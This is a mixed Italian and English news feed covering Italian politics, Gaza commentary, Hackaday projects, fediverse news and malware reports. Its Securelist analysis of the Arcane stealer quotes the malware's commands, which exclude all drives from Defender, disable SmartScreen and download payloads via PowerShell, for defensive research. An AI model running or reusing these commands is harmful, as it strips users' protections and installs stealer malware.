Salta al contenuto principale



Meloni contro il Manifesto di Ventotene: “Non è questa la mia idea di Europa” | VIDEO


@Politica interna, europea e internazionale
La presidente del Consiglio Giorgia Meloni prende le distanze dal Manifesto di Ventotene, considerato uno dei testi fondanti dell’Unione europea: “Non so se questa è la vostra idea di Europa, ma certamente non è la mia”, dice rivolgendosi alle opposizioni in




Mattarella scrive a Papa Francesco: “In questo mondo la sua voce è più che mai necessaria”


@Politica interna, europea e internazionale
“Mentre al livello internazionale sembrano affievolirsi le ragioni del Diritto e di una corretta articolazione della convivenza tra gli Stati, la Sua voce è e resta più che mai necessaria”. Lo scrive il presidente della Repubblica Sergio Mattarella in una lettera



“Glasses” That Transcribe Text To Audio


Glasses for the blind might sound like an odd idea, given the traditional purpose of glasses and the issue of vision impairment. However, eighth-grade student [Akhil Nagori] built these glasses with an alternate purpose in mind. They’re not really for seeing. Instead, they’re outfitted with hardware to capture text and read it aloud.

Yes, we’re talking about real-time text-to-audio transcription, built into a head-worn format. The hardware is pretty straightforward: a Raspberry Pi Zero 2W runs off a battery and is outfitted with the usual first-party camera. The camera is mounted on a set of eyeglass frames so that it points at whatever the wearer might be “looking” at. At the push of a button, the camera captures an image, and then passes it to an API which does the optical character recognition. The text can then be passed to a speech synthesizer so it can be read aloud to the wearer.

It’s funny to think about how advanced this project really is. Jump back to the dawn of the microcomputer era, and such a device would have been a total flight of fancy—something a researcher might make a PhD and career out of. Indeed, OCR and speech synthesis alone were challenge enough. Today, you can stand on the shoulders of giants and include such mighty capability in a homebrewed device that cost less than $50 to assemble. It’s a neat project, too, and one that we’re sure taught [Akhil] many valuable skills along the way.

youtube.com/embed/ApshHWClGoI?…


hackaday.com/2025/03/19/glasse…



Arcane stealer: We want all your data


At the end of 2024, we discovered a new stealer distributed via YouTube videos promoting game cheats. What’s intriguing about this malware is how much it collects. It grabs account information from VPN and gaming clients, and all kinds of network utilities like ngrok, Playit, Cyberduck, FileZilla and DynDNS. The stealer was named Arcane, not to be confused with the well-known Arcane Stealer V. The malicious actor behind Arcane went on to release a similarly named loader, which supposedly downloads cheats and cracks, but in reality delivers malware to the victim’s device.

Distribution


The campaign in which we discovered the new stealer was already active before Arcane appeared. The original distribution method started with YouTube videos promoting game cheats. The videos were frequently accompanied by a link to an archive and a password to unlock it. Upon unpacking the archive, the user would invariably discover a start.bat batch file in the root folder and the UnRAR.exe utility in one of the subfolders.

Archive root
Archive root

Contents of the "natives" subfolder
Contents of the “natives” subfolder

The contents of the batch file were obfuscated. Its only purpose was to download another password-protected archive via PowerShell, and unpack that with UnRAR.exe with the password embedded in the BATCH file as an argument.

Contents of the obfuscated start.bat file
Contents of the obfuscated start.bat file

Following that, start.bat would use PowerShell to launch the executable files from the archive. While doing so, it added every drive root folder to SmartScreen filter exceptions. It then reset the EnableWebContentEvaluation and SmartScreenEnabled registry keys via the system console utility reg.exe to disable SmartScreen altogether.
powershell -Command "Get-PSDrive -PSProvider FileSystem | ForEach-Object {Add-MpPreference -ExclusionPath $_.Root}"
reg add "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\AppHost" /v "EnableWebContentEvaluation" /t REG_DWORD /d 0 /f
reg add "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer" /v "SmartScreenEnabled" /t REG_SZ /d "Off" /f
powershell -Command "(New-Object Net.WebClient).DownloadString(\'https://pastebin.com/raw/<redacted>\')"
powershell -Command "(New-Object Net.WebClient).DownloadFile(\'https://www.dropbox.com/scl/fi/<redacted>/black.rar?rlkey=<redacted>&st=<redacted>&dl=1\', \'C:\\Users\\<redacted>\\AppData\\Local\\Temp\\black.rar\')"

Key commands run by start.bat

The archive would always contain two executables: a miner and a stealer.

Contents of the downloaded archive
Contents of the downloaded archive

The stealer was a Phemedrone Trojan variant, rebranded by the attackers as “VGS”. They used this name in the logo, which, when generating stealer activity reports, is written to the beginning of the file along with the date and time of the report’s creation.

Phemedrone and VGS logos
Phemedrone and VGS logos

Original distribution scheme
Original distribution scheme

Arcane replaces VGS


At the end of 2024, we discovered a new Arcane stealer distributed as part of the same campaign. It is worth noting that a stealer with a similar name has been encountered before: a Trojan named “Arcane Stealer V” was offered on the dark web in 2019, but it shares little with our find. The new stealer takes its name from the ASCII art in the code.

Arcane logo
Arcane logo

Arcane succeeded VGS in November. Although much of it was borrowed from other stealers, we could not attribute it to any of the known families.

Arcane gets regular updates, so its code and capabilities change from version to version. We will describe the common functionality present in various modifications and builds. In addition to logins, passwords, credit card data, tokens and other credentials from various Chromium and Gecko-based browsers, Arcane steals configuration files, settings and account information from the following applications:

  • VPN clients: OpenVPN, Mullvad, NordVPN, IPVanish, Surfshark, Proton, hidemy.name, PIA, CyberGhost, ExpressVPN
  • Network clients and utilities: ngrok, Playit, Cyberduck, FileZilla, DynDNS
  • Messaging apps: ICQ, Tox, Skype, Pidgin, Signal, Element, Discord, Telegram, Jabber, Viber
  • Email clients: Outlook
  • Gaming clients and services: Riot Client, Epic, Steam, Ubisoft Connect (ex-Uplay), Roblox, Battle.net, various Minecraft clients
  • Crypto wallets: Zcash, Armory, Bytecoin, Jaxx, Exodus, Ethereum, Electrum, Atomic, Guarda, Coinomi

In addition, the stealer collects all kinds of system information, such as the OS version and installation date, digital key for system activation and license verification, username and computer name, location, information about the CPU, memory, graphics card, drives, network and USB devices, and installed antimalware and browsers. Arcane also takes screenshots of the infected device, obtains lists of running processes and Wi-Fi networks saved in the OS, and retrieves the passwords for those networks.

Arcane’s functionality for stealing data from browsers warrants special attention. Most browsers generate unique keys for encrypting sensitive data they store, such as logins, passwords, cookies, etc. Arcane uses the Data Protection API (DPAPI) to obtain these keys, which is typical of stealers. But Arcane also contains an executable file of the Xaitax utility, which it uses to crack browser keys. To do this, the utility is dropped to disk and launched covertly, and the stealer obtains all the keys it needs from its console output.

The stealer implements an additional method for extracting cookies from Chromium-based browsers through a debug port. The Trojan secretly launches a copy of the browser with the “remote-debugging-port” argument, then connects to the debug port, issues commands to visit several sites, and requests their cookies. The list of resources it visits is provided below.


ArcanaLoader


Within a few months of discovering the stealer, we noticed a new distribution pattern. Rather than promoting cheats, the threat actors shifted to advertising ArcanaLoader on their YouTube channels. This is a loader with a graphical user interface for downloading and running the most popular cracks, cheats and other similar software. More often than not, the links in the videos led to an executable file that downloaded an archive with ArcanaLoader.

ArcanaLoader
ArcanaLoader

See translation

ЧитыCheats
НастройкиSettings
Клиенты с читамиClients with cheats
Все версииAll versions
Введите название читаEnter cheat name
Версия: 1.16.5Version: 1.16.5
ЗапуститьStart
Версия: Все ВерсииVersion: All versions

The loader itself included a link to the developers’ Discord server, which featured channels for news, support and links to download new versions.

Discord server invitation
Discord server invitation

See translation
You have been invited to Arcana Loader
548 online
3,156 users
Accept invitation

At the same time, one of the Discord channels posted an ad, looking for bloggers to promote ArcanaLoader.

Looking for bloggers to spread the loader
Looking for bloggers to spread the loader

See translation
ArcanaLoader BOT
Form:
1. Total subscribers
2. Average views per week
3. Link to ArcanaLoader video
4. Screenshot proof of channel ownership
YOUTUBE
Criteria:
1. 600* subscribers
2. 1,500+ views
3. Links to 2 Arcana Loader videos
Permissions:
1. Send your videos to the #MEDIA chat
2. Personal server role
3. Add cheat to loader without delay
4. Access to @everyone in the #MEDIA chat
5. Possible compensation in rubles for high traffic
MEDIA
Criteria:
1. 50+ subscribers
2. 150+ views
3. Link to 1 ArcanaLoader video
Permissions:
1. Send your videos to the #MEDIA chat
2. Personal server role

Sadly, the main ArcanaLoader executable contained the aforementioned Arcane stealer.

Victims


All conversations on the Discord server are in Russian, the language used in the news channels and YouTube videos. Apparently, the attackers target a Russian-speaking audience. Our telemetry confirms this assumption: most of the attacked users were in Russia, Belarus and Kazakhstan.

Takeaways


Attackers have been using cheats and cracks as a popular trick to spread all sorts of malware for years, and they’ll probably keep doing so. What’s interesting about this particular campaign is that it illustrates how flexible cybercriminals are, always updating their tools and the methods of distributing them. Besides, the Arcane stealer itself is fascinating because of all the different data it collects and the tricks it uses to extract the information the attackers want. To stay safe from these threats, we suggest being wary of ads for shady software like cheats and cracks, avoiding links from unfamiliar bloggers, and using strong security software to detect and disarm rapidly evolving malware.


securelist.com/arcane-stealer/…



Make Fancy Resin Printer 3D Models FDM-Friendly


Do you like high-detail 3D models intended for resin printing, but wish you could more easily print them on a filament-based FDM printer? Good news, because [Jacob] of Painted4Combat shared a tool he created to make 3D models meant for resin printers — the kind popular with tabletop gamers — easier to port to FDM. It comes in the form of a Blender add-on called Resin2FDM. Intrigued, but wary of your own lack of experience with Blender? No problem, because he also made a video that walks you through the whole thing step-by-step.
Resin2FDM separates the model from the support structure, then converts the support structure to be FDM-friendly.
3D models intended for resin printing aren’t actually any different, format-wise, from models intended for FDM printers. The differences all come down to the features of the model and how well the printer can execute them. Resin printing is very different from FDM, so printing a model on the “wrong” type of printer will often have disappointing results. Let’s look at why that is, to better understand what makes [Jacob]’s tool so useful.

Rafts and a forest of thin tree-like supports are common in resin printing. In the tabletop gaming scene, many models come pre-supported for convenience. A fair bit of work goes into optimizing the orientation of everything for best printed results, but the benefits don’t carry directly over to FDM.

For one thing, supports for resin prints are usually too small for an FDM printer to properly execute — they tend to be very thin and very tall, which is probably the least favorable shape for FDM printing. In addition, contact points where each support tapers down to a small point that connects to the model are especially troublesome; FDM slicer software will often simply consider those features too small to bother trying to print. Supports that work on a resin printer tend to be too small or too weak to be effective on FDM, even with a 0.2 mm nozzle.

To solve this, [Jacob]’s tool allows one to separate the model itself from the support structure. Once that is done, the tool further allows one to tweak the nest of supports, thickening them up just enough to successfully print on an FDM printer, while leaving the main model unchanged. The result is a support structure that prints well via FDM, allowing the model itself to come out nicely, with a minimum of alterations to the original.

Resin2FDM is available in two versions, the Lite version is free and an advanced version with more features is available to [Jacob]’s Patreon subscribers. The video (embedded below) covers everything from installation to use, and includes some general tips for best results. Check it out if you’re interested in how [Jacob] solved this problem, and keep it in mind for the next time you run across a pre-supported model intended for resin printing that you wish you could print with FDM.

youtube.com/embed/zZp-CLhH1Ao?…


hackaday.com/2025/03/19/make-f…



StilachiRAT: il malware fantasma che ruba credenziali e criptovalute senza lasciare traccia!


Un nuovo pericoloso Remote Access Trojan (RAT) altamente sofisticato, denominato StilachiRAT, sta circolando con l’obiettivo di sottrarre credenziali, dati sensibili e criptovalute. Questo malware utilizza tecniche avanzate di evasione per rimanere inosservato, garantire la persistenza e permettere ai cybercriminali di operare indisturbati.

Un RAT su misura per lo spionaggio e il furto


Scoperto a novembre 2024 dai ricercatori di Microsoft Incident Response, StilachiRAT si distingue per la sua capacità di infiltrarsi nei sistemi target senza destare sospetti.

Tra le sue principali funzioni troviamo:

  • Furto di credenziali: estrae informazioni sensibili salvate nei browser, inclusi i dati delle criptovalute.
  • Monitoraggio dell’attività utente: raccoglie dati di sistema, rileva la presenza di telecamere, analizza sessioni RDP attive e le applicazioni in esecuzione.
  • Attacco alle criptovalute: scansiona la configurazione di oltre 20 wallet digitali, tra cui Coinbase Wallet, Metamask e Trust Wallet.
  • Persistenza e movimento laterale: sfrutta Windows Service Control Manager per rimanere attivo e persiste anche dopo tentativi di rimozione.


Attacco silenzioso e pericoloso


StilachiRAT non si limita a raccogliere informazioni, ma implementa anche funzionalità avanzate per evitare il rilevamento:

  • Cancellazione dei log di sistema: elimina tracce dell’attacco per impedire indagini forensi.
  • Evasione da sandbox: utilizza chiamate API offuscate per rendere l’analisi più complessa.
  • Manipolazione delle finestre di sistema: monitora l’attività dell’utente per carpire password e dati sensibili direttamente dallo schermo.

Una volta insediato, StilachiRAT permette ai criminali di controllare il dispositivo infetto tramite comandi da un server C2. Questi comandi includono:

  • Esecuzione di applicazioni malevole;
  • Riavvio o sospensione del sistema;
  • Modifica di chiavi di registro di Windows;
  • Creazione di proxy per camuffare il traffico malevolo.


Difendersi è possibile


Sebbene Microsoft non abbia ancora attribuito StilachiRAT a un gruppo specifico, la sua pericolosità è evidente. Per ridurre il rischio di infezione, è essenziale adottare alcune contromisure:

  • Scaricare software esclusivamente da fonti ufficiali;
  • Utilizzare soluzioni di sicurezza avanzate che blocchino domini e allegati sospetti;
  • Monitorare le sessioni RDP e implementare autenticazione a più fattori;
  • Effettuare controlli di sicurezza regolari per individuare attività anomale.


Conclusione


Il panorama delle minacce informatiche non mostra segni di rallentamento e StilachiRAT ne è l’ennesima dimostrazione. Questo malware rappresenta un rischio concreto per aziende e utenti, con il suo focus su credenziali, criptovalute e accessi remoti. La difesa efficace passa attraverso la consapevolezza e l’adozione di misure di sicurezza mirate. L’informazione e la prevenzione sono le armi più potenti contro queste minacce in continua evoluzione.

L'articolo StilachiRAT: il malware fantasma che ruba credenziali e criptovalute senza lasciare traccia! proviene da il blog della sicurezza informatica.



Corso per docenti della scuola secondaria di primo grado: Leggere per Crescere

@Politica interna, europea e internazionale

UN LIBRO CONTRO IL DETERIORAMENTO CEREBRALE. LE SOLUZIONI DELLA SCUOLA AL BRAIN-ROT DELL’ERA DIGITALE. Il corso si propone di: dotare i docenti di strumenti pratici e teorici per comprendere il funzionamento del cervello umano durante la lettura



8 Anni di Sfruttamento! Il Bug 0day su Microsoft Windows Che Ha Alimentato 11 Gruppi APT


Il team di threat hunting di Trend Zero Day Initiative™ (ZDI) ha identificato casi significativi di sfruttamento di un bug di sicurezza in una serie di campagne risalenti al 2017. L’analisi ha rivelato che 11 gruppi sponsorizzati da stati provenienti da Corea del Nord, Iran, Russia e Cina hanno impiegato il bug monitorato con il codice ZDI-CAN-25373 in operazioni motivate principalmente da cyber spionaggio e furto di dati.

Trendmicro ha scoperto quasi mille campioni Shell Link (.lnk) che sfruttano ZDI-CAN-25373; tuttavia, è probabile che il numero totale di tentativi di sfruttamento sia molto più alto. Successivamente, i ricercatori hanno inviato un exploit proof-of-concept tramite il programma bug bounty di Trend ZDI a Microsoft, che ha rifiutato di risolvere questa vulnerabilità con una patch di sicurezza.
Numero di campioni da gruppi APT che sfruttano ZDI-CAN-25373 (fonte TrendMicro)
La vulnerabilità, identificata come ZDI-CAN-25373, consente agli aggressori di eseguire comandi dannosi nascosti sui computer delle vittime sfruttando file di collegamento di Windows (.lnk) appositamente creati. Questa falla di sicurezza influisce sul modo in cui Windows visualizza il contenuto dei file di collegamento tramite la sua interfaccia utente. Quando gli utenti esaminano un file .lnk compromesso, Windows non riesce a visualizzare i comandi dannosi nascosti al suo interno, nascondendo di fatto il vero pericolo del file.

Ad oggi sono stati scoperti quasi 1.000 artefatti del file .LNK che sfruttano ZDI-CAN-25373, la maggior parte dei quali è collegata a Evil Corp (Water Asena), Kimsuky (Earth Kumiho), Konni (Earth Imp), Bitter (Earth Anansi) e ScarCruft (Earth Manticore).

Degli 11 attori di minacce sponsorizzati dallo stato che sono stati scoperti ad abusare della falla, quasi la metà di loro proviene dalla Corea del Nord. Oltre a sfruttare la falla in vari momenti, la scoperta serve come indicazione di collaborazione incrociata tra i diversi cluster di minacce che operano all’interno dell’apparato informatico di Pyongyang.
Paesi di origine APT che hanno sfruttato ZDI-CAN-25373 (fonte TrendMicro)
Nello specifico, il bug comporta l’aggiunta degli argomenti con i caratteri di spazio (0x20), tabulazione orizzontale (0x09), avanzamento riga (0x0A), tabulazione verticale (\x0B), avanzamento pagina (\x0C) e ritorno a capo (0x0D) per eludere il rilevamento.

I dati di telemetria indicano che governi, enti privati, organizzazioni finanziarie, think tank, fornitori di servizi di telecomunicazione e agenzie militari/difesa situate negli Stati Uniti, in Canada, Russia, Corea del Sud, Vietnam e Brasile sono diventati i principali obiettivi degli attacchi che sfruttano questa vulnerabilità.

Negli attacchi analizzati da ZDI, i file .LNK fungono da veicolo di distribuzione per famiglie di malware note come Lumma Stealer, GuLoader e Remcos RAT, tra gli altri. Tra queste campagne, degna di nota è lo sfruttamento di ZDI-CAN-25373 da parte di Evil Corp.

Vale la pena notare che .LNK è tra le estensioni di file pericolose bloccate nei prodotti microsoft come Outlook, Word, Excel, PowerPoint e OneNote. Di conseguenza, il tentativo di aprire tali file scaricati dal Web avvia automaticamente un avviso di sicurezza che consiglia agli utenti di non aprire file da fonti sconosciute.

L'articolo 8 Anni di Sfruttamento! Il Bug 0day su Microsoft Windows Che Ha Alimentato 11 Gruppi APT proviene da il blog della sicurezza informatica.

Gazzetta del Cadavere reshared this.



Ddl Sicurezza, l’allarme delle opposizioni: “Troppi poteri ai Servizi segreti e schedature di massa”


@Politica interna, europea e internazionale
Le Commissioni Affari Costituzionali e Giustizia del Senato hanno approvato il contestato articolo 31 del nuovo ddl Sicurezza. Il via libera chiude l’esame degli emendamenti al disegno di legge, che – presentato dal Governo e già approvato dalla Camera lo



Mettetevi nei panni di un bambino palestinese e provate a capire cosa si prova a non avere più speranza, a non fidarsi più di nessuno. Mettetevi in una condizione di vita nella quale un popolo, quello israeliano sionista, vi consideri meno di bestie, decida quanta acqua potete bere, quanta corrente elettrica potete consumare. Mettetevi nei panni di un contadino della Cisgiordania che si vede tagliare con la motosega tutti gli olivi secolari da coloni invasati che non hanno niente di dissimile dai nostrani fascisti del ventennio. Mettetevi nei suoi panni quando deve subire le provocazioni senza potere reagire.
Moltiplicate questo per 365 giorni all’anno. Mettetevi nei panni di un ragazzino o un bambino che sta vivendo il genocidio del suo popolo nell’indifferenza generale. Mettetevi nei panni degli orfani, di chi al posto della casa, della via e del quartiere ora guarda una distesa disperata di macerie. Guardateli i potenti della terra ridere e scherzare con la tua vita tra le loro mani.
Mettevi nei panni di un palestinese che, sbagliando in modo colossale, si convinca che il fondamentalismo islamico sia la risposta a tanta violenza, (non capendo, colpevolmente, di avere a che fare con spudorati assassini della stessa identica matrice di quegli altri). Mettetevi nei panni di un palestinese senza più via d’uscita, senza speranza, senza futuro.
Niente possiamo noi pacifisti, niente possono gli israeliani sani, niente possono gli organismi internazionali e niente può la giustizia terrena e divina.

Il conflitto ha causato più di 70.000 morti dei quali circa 50.000 bambini e donne.
Questi sono stati sistematicamente sterminati grazie alle armi americane e alla colpevole e volontaria distrazione occidentale.

Lo stesso occidente conservatore, per mano americana, ha disarmato l’Onu, unico attore in grado di intervenire.

Netanyahu insieme ai generali del IDF sono indagati per evidenti crimini di guerra.
Nonostante questo viene riconosciuto come uno statista.
Trump, nel suo delirio di onnipotenza, vede Gaza israeliana e senza palestinesi.

Vale la pena ricordare che essere palestinesi non significa essere di Hamas.
Vale la pena ricordare che niente può giustificare l'omicidio di bambini.

Hamas, nonostante le perdite e la distruzione delle infrastrutture, è ancora in grado di gestire gli ostaggi e di vantarsi della propria bestialità.
L'operazione militare israeliana, relativamente alla risoluzione della tragedia degli ostaggi, è quindi un sostanziale fallimento. Invece, per quello che riguarda la persecuzione e l'impostazione di un moderno genocidio, uno grottesco successo.
I coloni, ignorando qualunque legge internazionale, hanno mano totalmente libera di commettere qualunque nefandezza.

Complessivamente stiamo assistendo a un inedito “colpo di stato (dei diritti) globale” da parte di una pletora di oligarchi che manipolano gruppi, movimenti e partiti uniti dalla convergenza di interessi (perlopiù economici).

Esiste quindi un “nuovo” asse iper-conservatore che mira al controllo globale bypassando ogni regola democratica.

Questi, al pari del nazi-fascismo, sono dalla parte sbagliata della storia.
Così come ieri sarei stato, senza neanche un dubbio, dalla parte degli ebrei, degli zingari e di qualsiasi minoranza perseguitata dal nazi fascismo. Oggi lo sono, senza se e senza ma, dalla parte dei popoli perseguitati dalla fame, guerra, dalla parte dei più deboli.

Non è un buon momento.

Valerio Perla reshared this.



IlBlues.org: Michele Dal Lago e Giusi Pesenti – un viaggio musicale


Bellissima serata al Bo.Po di Ponteranica (BG), dove si sono esibiti il chitarrista e cantante Michele Del Lago e la cantante e percussionista Giusi Pesenti. Nonostante i due siano nella scena da diversi anni, non avevo mai avuto il piacere di ascoltarli live...

ilblues.org/michele-dal-lago-e…



La manifestazione pro-Europa è stata pagata dal Comune di Roma. La Lega: “Presentiamo un esposto”


@Politica interna, europea e internazionale
La manifestazione pro-Europa che si è tenuta sabato scorso in piazza del Popolo a Roma è stata finanziata con fondi pubblici del Comune di Roma: l’esborso si aggira sui 270mila euro, tra allestimenti, logistica, servizio d’ordine e pulizia. Lo conferma

reshared this



Gaza. Israele scatena l’inferno promesso


@Notizie dall'Italia e dal mondo
Violenti bombardamenti su tutta la Striscia da nord a sud, senza preavviso. 150 bambini tra le vittime. Per Tel Aviv «è solo l’inizio». Colpite le case danneggiate dentro cui si riparavano intere famiglie, scuole-rifugio e tende per sfollatihttps://pagineesteri.it/2025/03/19/medioriente/gaza-israele-scatena-linferno-promesso/




Dovremmo imparare a goderci le cose che abbiamo, come se sapessimo che il giorno dopo ce le porterà via. Ma l'incapacità di apprezzare il momento è più forte e così, niente, perdiamo attimi che non avremo mai più.

Auguri papà.

#festadelpapa #19marzo



Gcap e cooperazione nella Difesa europea. Il momento di agire è ora

@Notizie dall'Italia e dal mondo

Per molto tempo abbiamo pensato che non sarebbe successo nulla in Europa, ci siamo preparati a operare in missioni di peacekeeping lontano dai nostri confini e senza una minaccia diretta ai nostri territori. Tutto questo è cambiato con l’invasione russa dell’Ucraina, che è servita da



“La Germania è tornata”


@Notizie dall'Italia e dal mondo
Berlino archivia l'austerità in nome del riarmo, pensa alla leva obbligatoria e droga l'economia con centinaia di miliardi di euro di finanziamenti pubblici a debito
L'articolo “La Germania è tornata” proviene da Pagine Esteri.

pagineesteri.it/2025/03/19/mon…



tech.everyeye.it/notizie/scope…


fatemi capire una cosa... trump vuole re-industrializzare gli stati uniti. teme ad esempio le auto cinesi. in questo contesto, far fallire tesla ha senso? è coerente con il progetto industriale? trump e elon musk sono proprio il gatto e la volpe... un trono per due. sono esagerata se sostengo che il progetto di trump non sta andando come dovuto?


#Gaza, ritorno al massacro


altrenotizie.org/primo-piano/1…



Siglato oggi il Protocollo d’intesa tra il Ministro dell'Istruzione e del Merito, Giuseppe Valditara, e il Rettore del Politecnico di Torino, Stefano Paolo Corgnati, per promuovere attività finalizzate a esplorare il rapporto tra tecnologia, umanità …


Cosa sono gli “incel”


Incel, abbreviazione dell’espressione inglese involuntary celibates (“casti non per scelta”): è utilizzata per definire uomini eterosessuali che non hanno rapporti sessuali perché si sentono discriminati e rifiutati dalle donne, che incolpano di privarli di quello che reputano un loro diritto.


ilpost.it/2025/03/18/incel/.



Newsletter publisher Ghost is now connecting to the fediverse in public beta, updates about the bridge that connects the fediverse with Bluesky, and more.


Fediverse Report #108

Newsletter publisher Ghost is now connecting to the fediverse in public beta, updates about the bridge that connects the fediverse with Bluesky, and more.

The News


The public beta for connecting Ghost to the fediverse is here, and the ActivityPub integration is now available for Ghost Pro subscribers. Ghost is a publishing platform for sending out blogs via email. With this latest update, Ghost now has another method of distribution, namely via the fediverse. Ghost’s integration with the fediverse consists of two parts: sending out long-form articles published on Ghost into the fediverse, and a reader app to the fediverse from Ghost.

Publishing Ghost articles on ActivityPub makes them accessible to the rest of the fediverse, similar to how WordPress with the ActivityPub plugin works. For users of Ghost this is an easy sales pitch, it is simply another free and automatic distribution channel for their blog. The second part of Ghost’s integration with the social web is a reader app. This app allows Ghost users to browse and read posts on the fediverse. It is split up into two parts: an inbox for reading other long-form posts from Ghost or WordPress, and a feed for all other types of posts. This allows accounts on Ghost not only to send out posts via the ActivityPub integration, but also to connect, respond and follow their audience. It even allows you to post short-form microblogs (notes), just like you’d use on Mastodon, that do not show up on the Ghost website. This makes the Ghost integration a full fediverse experience.

A New Social is the non-profit organisation that builds and manages cross-protocol tools for the open social web. The organisation currently manages Bridgy Fed, the connector that allows accounts to ‘bridge’ between both ActivityPub, ATProto, Nostr and more, and is currently in the process of setting up and launching the organisation. In their first update they shared this week, A New Social shared that they have a board of directors, consisting of Erin Kissane, Ben Werdmuller and Susan Mernit. Bridgy Fed Config is the first upcoming launch that they announced, scheduled for early April. To bridge their account, Bridgy Fed currently requires people to follow the Bridgy Fed account on their platform, which can be confusing and opaque for people as to what is actually happening and if it is working. The upcoming Config settings page allows people to log in with their social web account (Bluesky, Mastodon, Pixelfed) and turn the bridging on with a simple switch. A New Social also mentions supporting Threads with the new Bridgy Fed Config update, which is currently not supported by Bridgy Fed.

Forte is a new fediverse platform, that comes from the lineage of Hubzilla and Streams, created by the same developer Mike Macgirvin. Forte’s major feature is that it has Nomadic Identity over ActivityPub. Nomadic Identity means that you can port your entire account, including your posts, settings, social connections, etc. It is slightly different than the account migration that Mastodon has, which transfers your social graph to a new account. With Nomadic Identity, you create a single identity that can be connected to multiple different servers, so when one server becomes unavailable, all your personal data can be transferred and accessed from another server linked to your account. Forte, as well as Hubzilla and Streams, remain on the bleeding edge on what’s possible with ActivityPub. However, Forte also suffers from the same issue that its predecessors have, namely that getting to use the software is surprisingly difficult. By design there is no way to see a list of Forte servers. Forte mainly targets people with technical know-how, as the code repository does not include guide on how to setup your own Forte server. It leads to the funny situation where I would like to give Forte a try because I’m interesting in trying out the new features, but I legitimately do not know how.

Myo is a new image-focused client for the open social web, and allows you to connect your Mastodon, Bluesky and Nostr accounts into a single timeline. Combining multiple accounts into a single timeline is similar to OpenVibe, but Myo instead focuses media, in a design that is more reminiscent of Instagram than Twitter. Myo is made by the same developer as SoraSNS, which is also a multi-protocol app that focuses on microblogging instead. Myo and SoraSNS are both available for iOS.

ActivityPub badges is a new project that is currently in development to build a badges/credential system similar to Credly on ActivityPub. The project is currently at the proof-of-concept phase, where badges can be created and send over ActivityPub.

IFTAS, the non-profit for collaborative work on trust & safety on the fediverse, recently had to shut down various of their services due to a lack of funding. In their latest update, the organisation talks about how they are rescoping and moving forward, as the organisation itself is not shutting down. IFTAS will continue with various community support projects, such as their community platform IFTAS Connect. They will also continue providing insight into commonly blocked domains, in a scaled down version of the shut-down FediCheck program.

A new form of spam/scam has recently emerged on the fediverse, and it involves private messages from an account that identifies itself as ‘Nicole the fediverse chick’. So many people have gotten a variation of this message that it is quickly becoming a meme on the fediverse. It is unclear what the exact purpose of this spam is, with either a doxing ex or an elaborate 4chan troll as likely explainers.

This article by Fassbender examines how state surveillance treats federated and decentralised social networks, focusing on the BlueLeaks dataset, which contains a large amount of internal documentation of state surveillance organisations. Fassbender writes: “[…] surveillance actors are less interested in understanding decentralization within platforms, but rather look at organizations first, then take an interest in all platforms that they spread to. This means that any platform (or in the case of the fediverse, grouping of platforms that share a method for interconnecting) can become suspect.”

The Links


That’s all for this week, thanks for reading! You can subscribe to my newsletter to get all my weekly updates via email, which gets you some interesting extra analysis as a bonus, that is not posted here on the website. You can subscribe below:

#fediverse

fediversereport.com/fediverse-…




Mecenatismo oggi: tra promozione e valorizzazione dell’arte.


Dal Rinascimento a oggi, il mecenatismo è stato un ponte tra potere, ricchezza e cultura. Oggi, dal report di Avant Arte, vediamo una trasformazione di questo fenomeno: una nuova generazione di collezionisti e mecenati non si limita più a sostenere economicamente musei e istituzioni, ma partecipa attivamente alla diffusione dell’arte. Questo cambiamento porta con sé una riflessione fondamentale: il mecenatismo contemporaneo deve solo promuovere o anche valorizzare?

Promuovere vs valorizzare: una distinzione cruciale

Spesso si usano questi termini come sinonimi, ma hanno significati profondamente diversi. Promuovere significa amplificare la visibilità di un'opera, un artista o un progetto attraverso strategie di comunicazione, marketing e diffusione. È un primo passo importante, ma da solo non garantisce la crescita culturale. Valorizzare, invece, è un processo più profondo: significa riconoscere e accrescere il valore di un’opera, mettendone in luce il significato, inserendola in un contesto che ne amplifichi la portata culturale e sociale.

Se il mecenatismo moderno vuole davvero lasciare un segno, non può limitarsi alla promozione. Deve creare connessioni, contesti e significati che permettano all’arte di avere un impatto duraturo nella società.

Il futuro del mecenatismo

Il modello che emerge dal report di Avant Arte suggerisce che i nuovi collezionisti vogliono essere più coinvolti nel processo creativo e culturale. Questa è una grande opportunità: il mecenatismo non è più solo un privilegio di pochi, ma può diventare un motore collettivo per sostenere e dare valore all’arte contemporanea.

Forse la vera sfida è questa: riusciremo a costruire un mecenatismo che non sia solo un investimento di mercato, ma un atto politico e culturale capace di generare un impatto reale?

@Arte e Cultura
@Cultura

artribune.com/professioni-e-pr…

#Arte #mecenatismo #collezionismo #cultura #artecontemporanea

reshared this

in reply to Nicola Pizzamiglio

Il mecenatismo contemporaneo deve andare oltre la semplice promozione e puntare alla valorizzazione. Non basta amplificare la visibilità dell'arte: è necessario collocarla in un contesto che ne amplifichi il messaggio e ne approfondisca il significato. Questo significa creare connessioni culturali, storiche o sociali che rendano l'opera rilevante e duratura per il pubblico, garantendo un impatto che va oltre il momento della semplice esposizione. In altre parole, visibilità senza profondità rischia di non lasciare un segno. Il coinvolgimento diretto dei mecenati nel processo creativo rappresenta una grande opportunità per rendere il mecenatismo un motore culturale e sociale, non solo un investimento di mercato. La sfida? Trasformarlo in un atto consapevole, capace di generare un impatto reale.

Arte e Cultura reshared this.

in reply to Antonio Marano

@Antonio Marano Sono molto d'accordo con te, valorizzare dovrebbe essere una reale creazione di valore e di significato, è creare ragionamento attorno a un contesto. In questo modo l'arte non è solo qualcosa da guardare staticamente, ma diventa finalmente motore attivo che può essere utile a capire la realtà e il contesto sociale e culturale. La cosa che ho notato è che spesso viene confuso o usato come sinonimo di promozione e la sovrapposizione dei piani tende ad andar a invalidare l'una e l'altra.

Arte e Cultura reshared this.




Von der Leyen annuncia la roadmap per il riarmo europeo entro il 2030. I dettagli

@Notizie dall'Italia e dal mondo

Un’altra settimana di appuntamenti importanti per il futuro della difesa europea. La presidente della Commissione europea, Ursula von der Leyen, rilancia sull’autonomia strategica dell’Unione e annuncia il piano Readiness 2030, una roadmap per rendere





Usa e Ucraina collaborano sui droni kamikaze. Il progetto Artemis

@Notizie dall'Italia e dal mondo

